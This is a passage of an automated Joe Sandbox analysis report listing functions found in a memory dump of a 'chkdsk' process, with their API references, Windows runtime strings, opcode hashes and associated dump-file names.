                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  • Opcode ID: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                  • Instruction ID: 097e49719ffc325ea1b42b744fe94e52887e501acb84db9ca3b4e43b5509363a
                                  • Opcode Fuzzy Hash: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                  • Instruction Fuzzy Hash: 00510871B403116FEB55CB18CCC1FA633EAAB98710F218259ED55DF285DA31EC42AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020514C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 0207EA22
                                    • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 0205146B
                                    • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 02051490
                                  • ___swprintf_l.LIBCMT ref: 0205156D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                  • Instruction ID: ade23c89b11aa6fd560e456ad6a042d140bb578c66bc9abd25c5de5981d2d709
                                  • Opcode Fuzzy Hash: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                  • Instruction Fuzzy Hash: EF219172900329EBDB61DE58CC40BEFB3BDEB10704F444565EC4AE3140EB70AA589BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020B3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: f61ff385bf56c88bb7b9a2e28b378a71166eb5acf0c5f6a791bc8bc4c591eede
                                  • Instruction ID: e5d060cfd709f4137fa8d4ec41928adb7e9c51a915e412d8842057b4a89adc18
                                  • Opcode Fuzzy Hash: f61ff385bf56c88bb7b9a2e28b378a71166eb5acf0c5f6a791bc8bc4c591eede
                                  • Instruction Fuzzy Hash: 0C2142B690032AABCB22AF68CC459EF73EDEF14308F140166FC15A3140EB709A04DBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020353A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020722F4
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020722FC
                                  • RTL: Re-Waiting, xrefs: 02072328
                                  • RTL: Resource at %p, xrefs: 0207230B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  • Opcode ID: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                  • Instruction ID: cba7b01d8d031cba51416ddc9eb92490642a7cc45a2c6d0cd297ff3301ec1b57
                                  • Opcode Fuzzy Hash: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                  • Instruction Fuzzy Hash: A051F7B16007166FEB169B24CCC0FE777DDAF58724F104219ED45DB290EB61E841AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0203EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0207248D
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020724BD
                                  • RTL: Re-Waiting, xrefs: 020724FA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  • Opcode ID: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                  • Instruction ID: 3debd61edaee847c665a67c3349a461c5cea1ed26ac4330ab07bab560d7a46f3
                                  • Opcode Fuzzy Hash: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                  • Instruction Fuzzy Hash: 9C41B2B0A00304AFDB61DB68CC88FAE77F9AF44720F108655FA559B2D0D734E941EBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0204FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction ID: f43cf34e722000989ec3a8c4b396f0380e7496f1627bed7426020a09e66b15ba
                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction Fuzzy Hash: 3991ADB1D0031AEEDF25CF9AC8486EEBBF5FB41309F20C0BAD405A6551EB705A41EB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020C5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: $$0
                                  • API String ID: 1302938615-389342756
                                  • Opcode ID: 5ec53fd174c94412d6c9a2f6be3b97f00ee82c4503b8347db2541d895e0a5d7d
                                  • Instruction ID: e43cb7a34473cd81ff704d146df66396da0fa074d6c0477280e8a2253e5aeb5c
                                  • Opcode Fuzzy Hash: 5ec53fd174c94412d6c9a2f6be3b97f00ee82c4503b8347db2541d895e0a5d7d
                                  • Instruction Fuzzy Hash: BB91AFF8C0439A9ADF6ACF988C443EDBFF1AF01314FA4465ED4A1B6291C3746641EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%